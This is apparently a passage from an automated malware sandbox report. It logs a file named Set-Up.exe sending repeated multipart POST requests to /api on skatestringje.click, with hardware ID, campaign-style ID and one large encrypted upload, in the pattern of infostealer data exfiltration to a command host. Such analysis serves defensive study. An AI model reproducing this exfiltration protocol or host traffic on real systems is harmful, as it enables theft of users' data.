                                                                            2025-01-15 15:00:28 UTC8795OUTData Raw: 2d 2d 5a 53 4a 37 38 46 31 32 53 44 51 53 50 30 48 46 46 44 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 43 30 34 46 37 41 42 32 44 45 35 45 32 42 36 37 39 33 31 45 37 38 39 37 46 31 35 44 46 45 0d 0a 2d 2d 5a 53 4a 37 38 46 31 32 53 44 51 53 50 30 48 46 46 44 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 53 4a 37 38 46 31 32 53 44 51 53 50 30 48 46 46 44 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 4c 65
                                                                            Data Ascii: --ZSJ78F12SDQSP0HFFD5Content-Disposition: form-data; name="hwid"92C04F7AB2DE5E2B67931E7897F15DFE--ZSJ78F12SDQSP0HFFD5Content-Disposition: form-data; name="pid"2--ZSJ78F12SDQSP0HFFD5Content-Disposition: form-data; name="lid"c2CoW0--Le
                                                                            2025-01-15 15:00:29 UTC1134INHTTP/1.1 200 OK
                                                                            Date: Wed, 15 Jan 2025 15:00:29 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=77pfh3jr8am9gg2tbohvb8244v; expires=Sun, 11 May 2025 08:47:08 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p4cb3FLF2ZPH65BeYAzhuPx49hmv9izlKeIq6%2BhD1xJ%2Bk%2Fh76BM%2B6UTAUF%2BuaPFN1TvMo0AnXXX7cspK6QIFz7b4Yc8fYDhTdwtAgjkWVAeUfywgduE%2FjdLogagACsnY4FqzOVKI"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9026bc513b7da27f-YUL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=17785&min_rtt=17767&rtt_var=6675&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9738&delivery_rate=164349&cwnd=32&unsent_bytes=0&cid=cdac852ea4df1c6a&ts=791&x=0"
                                                                            2025-01-15 15:00:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-15 15:00:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449739104.21.75.154437352C:\Users\user\Desktop\Set-Up.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 15:00:30 UTC285OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=GEZHOTMV3AP6JSGXBA
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20442
                                                                            Host: skatestringje.click
                                                                            2025-01-15 15:00:30 UTC15331OUTData Raw: 2d 2d 47 45 5a 48 4f 54 4d 56 33 41 50 36 4a 53 47 58 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 43 30 34 46 37 41 42 32 44 45 35 45 32 42 36 37 39 33 31 45 37 38 39 37 46 31 35 44 46 45 0d 0a 2d 2d 47 45 5a 48 4f 54 4d 56 33 41 50 36 4a 53 47 58 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 45 5a 48 4f 54 4d 56 33 41 50 36 4a 53 47 58 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 4c 65 64 67 65
                                                                            Data Ascii: --GEZHOTMV3AP6JSGXBAContent-Disposition: form-data; name="hwid"92C04F7AB2DE5E2B67931E7897F15DFE--GEZHOTMV3AP6JSGXBAContent-Disposition: form-data; name="pid"3--GEZHOTMV3AP6JSGXBAContent-Disposition: form-data; name="lid"c2CoW0--Ledge
                                                                            2025-01-15 15:00:30 UTC5111OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`
                                                                            2025-01-15 15:00:31 UTC1141INHTTP/1.1 200 OK
                                                                            Date: Wed, 15 Jan 2025 15:00:31 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=1on007jottjmnhcbubiggi7on3; expires=Sun, 11 May 2025 08:47:10 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eC4f6isS%2BnJ%2B%2F%2B%2FOlX7ULtKVXm%2FjIRLTwJQFs36KFqnPlAv0WHEETYvNGWdd5CV6WGs124b7wW%2FbxAMf5%2B48hV4l7jjO5uLnB2LJDwZkqbuCMjdP2JUS8Y9RAluTocGldkSGYTxY"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9026bc5d3f5aa2de-YUL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=24992&min_rtt=18047&rtt_var=11729&sent=13&recv=28&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21407&delivery_rate=161799&cwnd=32&unsent_bytes=0&cid=f03cd9509a9daeee&ts=827&x=0"
                                                                            2025-01-15 15:00:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-15 15:00:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.449741104.21.75.154437352C:\Users\user\Desktop\Set-Up.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 15:00:32 UTC285OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=4L0R90MN06WVK36KKMX
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1422
                                                                            Host: skatestringje.click
                                                                            2025-01-15 15:00:32 UTC1422OUTData Raw: 2d 2d 34 4c 30 52 39 30 4d 4e 30 36 57 56 4b 33 36 4b 4b 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 43 30 34 46 37 41 42 32 44 45 35 45 32 42 36 37 39 33 31 45 37 38 39 37 46 31 35 44 46 45 0d 0a 2d 2d 34 4c 30 52 39 30 4d 4e 30 36 57 56 4b 33 36 4b 4b 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 4c 30 52 39 30 4d 4e 30 36 57 56 4b 33 36 4b 4b 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 4c 65
                                                                            Data Ascii: --4L0R90MN06WVK36KKMXContent-Disposition: form-data; name="hwid"92C04F7AB2DE5E2B67931E7897F15DFE--4L0R90MN06WVK36KKMXContent-Disposition: form-data; name="pid"1--4L0R90MN06WVK36KKMXContent-Disposition: form-data; name="lid"c2CoW0--Le
                                                                            2025-01-15 15:00:33 UTC1127INHTTP/1.1 200 OK
                                                                            Date: Wed, 15 Jan 2025 15:00:33 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=0vcicfaom0ct3s0evl0oe1ho5t; expires=Sun, 11 May 2025 08:47:11 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IX9055aX%2BwJLEiLjvOS2V63Ov0BFaqA2DO3%2FWsq%2BHA8yjggs%2B4xGrYi7ZBFWTbAAv6DFph3xMsXJiSVjQonsv3HhMyViuyAucLCjHq461g9oaxlpkGOopR0qXIzMshCxg65Lit9I"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9026bc681cbd9c3c-IAD
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7791&min_rtt=7228&rtt_var=3113&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2343&delivery_rate=403984&cwnd=32&unsent_bytes=0&cid=54c6930bb908720b&ts=538&x=0"
                                                                            2025-01-15 15:00:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-15 15:00:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.449742104.21.75.154437352C:\Users\user\Desktop\Set-Up.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 15:00:34 UTC286OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=XSDE08Y004PL7YFLYF
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 564982
                                                                            Host: skatestringje.click
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: 2d 2d 58 53 44 45 30 38 59 30 30 34 50 4c 37 59 46 4c 59 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 43 30 34 46 37 41 42 32 44 45 35 45 32 42 36 37 39 33 31 45 37 38 39 37 46 31 35 44 46 45 0d 0a 2d 2d 58 53 44 45 30 38 59 30 30 34 50 4c 37 59 46 4c 59 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 53 44 45 30 38 59 30 30 34 50 4c 37 59 46 4c 59 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 4c 65 64 67 65
                                                                            Data Ascii: --XSDE08Y004PL7YFLYFContent-Disposition: form-data; name="hwid"92C04F7AB2DE5E2B67931E7897F15DFE--XSDE08Y004PL7YFLYFContent-Disposition: form-data; name="pid"1--XSDE08Y004PL7YFLYFContent-Disposition: form-data; name="lid"c2CoW0--Ledge
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: 6c a9 3e 08 78 87 a7 8d 15 b9 4a 9d 20 9a 24 21 dd 7c c7 c5 d9 bf ae 53 94 64 16 b2 0c ee 3b 1d fd 90 77 94 90 34 73 e7 cd 53 61 c2 3c e6 86 1e 66 0a 69 3a b7 50 52 40 c8 17 db 34 e9 15 b1 7d fc 2c dc 67 15 9a b4 33 57 74 ad 19 8a 76 57 2f e0 db c6 b0 7c 7a 82 48 ce ba ef 2e 38 4b d0 46 34 38 61 17 e2 14 eb f1 19 30 1c 2d a3 f8 c0 3f 13 3f 6a ff 93 7c 1a 47 a4 a5 9a cd 2f d6 24 2e 0c 70 4d d9 42 6c 11 96 84 6d af 1b 40 c8 91 c6 72 67 ed 4e da ba d6 cb 1c 4e 6e 67 94 c4 ca 7b 2a 94 65 7d 04 a9 1f 29 ba 07 df c4 84 59 2b d7 cf 69 4c ba 15 c7 47 1f 25 84 9d ab 30 67 9a 5b 9b e7 28 f4 62 d8 9e 96 85 49 2b 1f c4 52 45 9c 92 e4 54 dc df 4c 70 a3 8c b9 93 fb 0c 6f a0 d2 28 d8 06 bd eb 55 73 43 25 6b ac 9e 2e b7 61 72 19 26 06 4e 5d 72 d5 b4 b0 b5 cc 08 09 a4 2a
                                                                            Data Ascii: l>xJ $!|Sd;w4sSa<fi:PR@4},g3WtvW/|zH.8KF48a0-??j|G/$.pMBlm@rgNNng{*e})Y+iLG%0g[(bI+RETLpo(UsC%k.ar&N]r*
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: ef 8f 8e b0 7d cd a4 9f 3d f0 c1 43 36 f6 e3 7c 0a ce da d2 f8 f8 78 de 45 58 da 43 58 b8 ef e2 26 94 fd 8e 6e 38 3f a3 72 64 3e 1e aa da 1b 97 e5 88 bc b1 ef b2 9c ce 9d d3 b8 7a 45 fa cf 3d b1 92 b8 66 80 87 14 05 88 c1 31 f6 b8 bd fb e4 d2 a9 d2 97 99 39 7b d7 4b 56 5c ab 44 21 6c 98 10 f0 ba 6d 11 b4 e1 8b 45 b6 0c e9 f7 25 d5 fd 9a fe cd 33 85 39 b1 f7 97 6a ea 7c b0 86 cc d4 ea f9 cc b0 e1 26 8f 42 bf 89 96 94 20 29 07 9f 48 16 23 a1 c0 5f b9 30 b8 3f 7c 5f 6c 44 67 b6 01 47 e5 60 03 45 f5 55 1b f3 13 0f f9 b2 2c de a9 1a e0 2f 57 cf ca 33 92 78 15 fd 96 ea 10 80 29 c6 f8 ee f7 34 8c 39 c1 11 0d 6d 7c e1 dd 9a 74 b7 52 7d a8 7c c4 b1 96 79 ae 7c bb 5d 88 de 7e 6e a9 72 fa 5d 7b 80 3a 79 e2 05 fd 51 b8 b0 af 80 94 fa 37 30 ca 09 f8 71 49 41 f7 0b 7d
                                                                            Data Ascii: }=C6|xEXCX&n8?rd>zE=f19{KV\D!lmE%39j|&B )H#_0?|_lDgG`EU,/W3x)49m|tR}|y|]~nr]{:yQ70qIA}
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: d2 cc 28 64 60 24 34 8f 5a fd c0 e0 1e 99 78 27 21 d2 85 6b 54 f0 e9 31 e5 1c 78 d3 b2 e3 cb 5b 72 32 a8 73 db 74 88 68 b1 1f 85 7e 55 72 58 95 8a df 1f df b0 00 cc 93 c3 f6 02 df 6a 2f ca 99 3b fc e2 1e 5d f9 f1 db 7f 7e 7b e7 dc 54 a0 fd d4 2e 3e fb 25 d9 7c 05 83 a7 f4 8b 74 fa 99 b3 a2 d1 e9 27 57 23 fe e1 fd 3d 81 05 b9 6b 1b 67 e9 7a bb b1 34 83 5d 4d 39 b3 7d 84 15 03 4a 73 84 5b c8 ce 11 a1 54 dd bd d0 ed 08 df dd 23 16 8a 0e 7f 90 ec ae 51 41 2e 04 9a 37 06 21 98 40 9d c6 e4 ea bd e7 b6 af 9c a2 24 6d ab c9 00 f5 77 fc f6 da b9 43 60 2e 40 00 10 bd c1 10 6a 91 98 c8 dc 07 8c ef 76 76 a1 11 2a 06 d3 eb 4e 65 b8 0e eb 0b 6d 57 13 be 6f f8 64 b1 27 75 78 33 22 6a 55 3e c2 4f d4 c8 74 48 3e 32 70 cc 05 97 f2 e3 d7 79 bb e1 c0 9b 46 cc f7 b4 14 d8 08
                                                                            Data Ascii: (d`$4Zx'!kT1x[r2sth~UrXj/;]~{T.>%|t'W#=kgz4]M9}Js[T#QA.7!@$mwC`.@jvv*NemWod'ux3"jU>OtH>2pyF
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: 0b c1 85 52 a1 3e cb d0 fa 79 04 13 84 8b 4a a2 38 3f 19 dd a3 54 05 e5 6a 4f 34 0a 25 c2 51 01 88 0d c2 83 77 87 22 e0 84 7b 17 f9 c0 cf b5 2c 2b b5 be a3 a1 0a ac 4d 68 14 ea bb 9a fb 98 d9 52 6b 1c 87 6b 33 ce 26 26 ce 9c c4 a5 9b 18 21 4c 9d be 5f 6b 22 a1 d5 4a 06 e6 c5 48 09 f0 b8 5e b2 d3 c1 89 9e 1e c5 bd 57 80 15 20 12 63 88 70 58 54 b2 70 30 a3 ed 1c 56 78 7e 28 48 6f 44 3e 95 7d 98 68 17 ea c3 f3 03 c9 7f e0 8c dd bf eb cf ee e7 69 6e 3a d0 e9 1b 9f ee 8d 33 63 a6 dd fd 46 f7 d9 10 6e 42 58 a1 e4 33 c5 26 5f 13 43 13 8a 89 7e b2 b3 60 3a 63 31 13 6d d5 c9 e4 d4 05 96 59 bb 60 9c 68 f0 9d 86 87 e6 dd e2 cc 57 52 41 f3 c9 1e dc b3 3a ae 83 72 cf 66 1a 5b 9a 3e c5 db 82 0a 25 10 9d 54 10 87 df c6 f3 03 ca be ac 50 b8 72 47 53 e3 71 8b 59 e8 cf 7f
                                                                            Data Ascii: R>yJ8?TjO4%Qw"{,+MhRkk3&&!L_k"JH^W cpXTp0Vx~(HoD>}hin:3cFnBX3&_C~`:c1mY`hWRA:rf[>%TPrGSqY
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: a6 65 68 7a 43 84 e6 40 ce 7e d3 fe 3a 96 fb be a4 8d 62 6c 17 83 7b 9a e8 1a 63 e8 ee 9e 24 ec c0 07 d6 64 63 4c 3d 8d 04 06 cf 7f 3d 7c 2c d4 8c bf 5e ec db aa b2 5a 71 bc f1 c4 9e 88 e2 9f 12 fb 29 5a 60 42 3e f2 0e 52 28 97 73 f0 22 62 16 e3 fc c6 5a 5c 14 42 21 24 26 f6 41 bc 82 f4 10 34 45 86 fb 87 76 2e e4 37 4d 7e 07 50 db da 7f 2e be 59 64 bf ad fe ab f4 ed 87 f6 0f 00 02 0b ea cc e0 68 a4 56 1c 75 a6 3f 10 03 8c 67 2c 3b 0f 42 21 be 44 30 09 15 43 4e de 7c f7 01 27 57 3d fa 30 3e b4 03 31 cb 5f 7e a5 bc d5 bc 00 0a 5a aa 1f 62 e1 fe 68 cf 82 3b d1 8b b5 f6 5e 6b 64 17 38 32 76 59 da 4a 32 39 e4 de 5a 28 7a af a0 e6 d3 c8 19 fd c9 3c 99 fd 35 fb 52 2f 9e 2f d0 d8 06 a5 a7 61 6d 9e 3c ab 7d a2 7b c3 52 e7 7f 57 e2 12 f6 83 2e 15 8c 81 34 60 5a b8
                                                                            Data Ascii: ehzC@~:bl{c$dcL==|,^Zq)Z`B>R(s"bZ\B!$&A4Ev.7M~P.YdhVu?g,;B!D0CN|'W=0>1_~Zbh;^kd82vYJ29Z(z<5R//am<}{RW.4`Z
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: 0a 21 37 c7 5e ac 38 69 fa 28 12 b3 d9 bd 93 70 1d 53 d8 f0 da fd 9b e1 6d 6c 0e 57 bc a3 2d ae 80 8c 0b 80 17 f1 6b 10 62 8c 93 61 6f cd d3 ba ac 65 63 3a e2 dd af 6c 79 06 8a d3 d4 16 b0 ca bb 51 71 95 f9 28 fe f3 26 6b 44 3f c9 59 c6 70 2d da 04 93 f9 cd b2 2d 7f b9 b3 d1 34 c6 84 2b 36 90 31 c3 40 c1 b6 04 7d 44 af fc 97 f8 28 e1 ac c9 26 b1 3f d6 6b e4 db 45 21 27 e9 5e 7e 0a 89 99 40 0a e4 f4 cc 21 cb c4 f7 57 bf 69 de d3 1c 59 a5 17 2d c3 6d d2 38 e9 eb 91 ba d3 d3 b3 8f 16 24 94 16 da 73 46 6f 8f e4 f1 b2 5a 60 e0 86 61 ea ff f7 68 df 53 fc 80 b6 e0 a9 b7 a0 78 ba df 36 d6 10 f7 fc 4a 48 a5 61 f8 d2 27 e3 ef 00 13 c0 9e 5a fc 4e ce ba 26 c9 3d 1d 0b 76 72 38 4e dc 4f ea 0f 7a 86 08 ca 4c 12 b5 06 43 5c 72 0c 11 fb 25 05 6e 48 43 1a ff ef 00 d1 d3
                                                                            Data Ascii: !7^8i(pSmlW-kbaoec:lyQq(&kD?Yp--4+61@}D(&?kE!'^~@!WiY-m8$sFoZ`ahSx6JHa'ZN&=vr8NOzLC\r%nHC
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: ea d1 ad 9d b3 99 17 d8 0e 64 9e f2 db 17 3f c5 05 0d 5b fb d9 22 d0 41 15 d9 2d 71 5b ed 82 86 f3 98 9e c2 c2 bc e9 00 a4 34 d0 b9 0d 5a eb ac f9 a6 05 0a b9 2a af 37 fb c8 dd 31 7e fa 1d 7c c8 29 b6 3a 42 41 bf a7 ff da 23 71 f4 f0 ee d9 63 ba 58 aa fc 0b 22 c7 54 0e 83 03 68 2b 8c 0f 88 6e fc 51 70 59 30 79 41 a7 c2 e2 ae fb e2 09 a6 67 50 66 e4 d6 15 74 07 6c 37 d8 8d b9 54 95 a0 03 90 e2 a3 fe a9 bf 20 42 04 37 44 3c cf 7d 1a 01 52 d3 77 61 b1 4a 75 71 e4 3b ac 37 4a 38 42 23 6a f3 e7 15 6a 21 c5 7c 03 c7 7b 1c a0 fc cf e7 c0 28 76 0f 1e 7f af 8f 8b 90 e2 a9 28 c2 c7 73 52 52 20 18 47 3d 96 cf 8c ba c3 e5 c5 d0 94 8e 95 84 7c 27 61 cd 3b 1c 74 e0 bf fd d7 aa bf b5 8a 14 a6 39 e4 36 1c c5 bb 72 fb b6 89 1a f8 b0 07 3b c8 b9 55 9b 7e 34 39 22 13 d9 f1
                                                                            Data Ascii: d?["A-q[4Z*71~|):BA#qcX"Th+nQpY0yAgPftl7T B7D<}RwaJuq;7J8B#jj!|{(v(sRR G=|'a;t96r;U~49"
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: 9c 7a 2a a9 07 d8 ef 7e 95 6a 9a e1 09 ae 3c 6b ca 6d c4 aa 64 d1 7b 36 aa 01 2f e3 2e 5a 36 35 43 84 6b 62 3b 54 2f 1d c5 52 b8 71 7d f7 11 d7 e0 05 af bb 69 da 1c 2c 93 d4 f2 3c c5 06 04 74 d4 e6 a9 a3 8a 10 fa 8a 36 9e fc a2 58 d1 6e 2f 31 7b cf 75 87 2e 6e 3e e9 09 ae 1a a5 03 9b fe 98 a0 f9 0f 9b d1 be 04 89 b8 42 81 98 42 6b a6 bd 5e ee dc b0 71 e9 66 f1 61 7b 79 4a e7 8c 64 02 f0 5e c0 40 0a ee dc ac 15 75 b3 e6 7b da 91 b0 95 32 2d 24 89 2b 9a 58 7f 54 33 9a 71 27 94 b2 62 43 51 70 10 62 ff c6 3b 90 d2 c5 c7 cb bb 4d bc a5 67 2d 9f bb 1d 99 b8 14 69 c5 bc 52 42 c1 a8 88 bb 40 7b b5 b1 f5 c5 f8 80 ca 9a ca b7 ba 8d f3 a4 9d af 0b ad b9 bf 33 4a 42 a6 d3 8c 1a 44 2e d5 b8 c2 7b 1e fb ad bb 20 f5 1a 6e 07 a8 2f da 30 89 8d e9 61 19 e7 b6 af 47 a2 42
                                                                            Data Ascii: z*~j<kmd{6/.Z65Ckb;T/Rq}i,<t6Xn/1{u.n>BBk^qfa{yJd^@u{2-$+XT3q'bCQpb;Mg-iRB@{3JBD.{ n/0aGB
                                                                            2025-01-15 15:00:34 UTC15331OUTData Raw: 59 98 ac c1 65 cf 01 fd 9f b1 db e6 87 e2 f5 0a 11 a6 4f 2f 74 65 7d 46 94 24 60 a7 b1 9c 69 23 5a 7a af 75 66 e4 67 ab 18 16 24 7d c8 cd 72 f2 4f d1 2b 85 c3 45 40 87 cf 47 3e fa d1 05 ad d8 30 47 9e e7 5d 77 59 7b b8 58 25 c5 fb d5 40 54 75 fa 67 76 1b 7f 8b 3c 47 b8 25 73 99 d9 92 c9 0e 69 c9 dc e2 f8 cf 3a 71 d7 c5 ba 69 26 2b 3f 0e 36 05 a8 4d ab 01 de 1b ef a9 d5 6d 05 9c e5 02 24 aa 72 ae 34 ab cc 35 dc ff 4d c5 28 ff f1 7e 3f 13 ce 67 d6 8c 90 5f 59 af b1 c0 66 ff 75 3f 14 fe c6 93 38 78 a9 75 eb 76 d8 e2 9d 05 df 81 58 bb 8a c1 e9 e0 77 15 73 0f d4 32 9e b0 0a 5a 9a 65 67 fa 5e f4 de 94 2a ad 8a a3 28 00 13 f6 76 c6 d3 79 30 ff 3d 73 cb 5f 52 18 15 72 5d d1 88 f1 8c ce ef 1a d0 bb b9 71 fb 1e 12 7c d9 62 3c 6c 0a 9a d3 a4 96 e0 80 46 84 fb e9 fc
                                                                            Data Ascii: YeO/te}F$`i#Zzufg$}rO+E@G>0G]wY{X%@Tugv<G%si:qi&+?6Mm$r45M(~?g_Yfu?8xuvXws2Zeg^*(vy0=s_Rr]q|b<lF
                                                                            2025-01-15 15:00:36 UTC1136INHTTP/1.1 200 OK
                                                                            Date: Wed, 15 Jan 2025 15:00:36 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=kjpkvkc74jg50ni35bdfk09u3n; expires=Sun, 11 May 2025 08:47:14 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
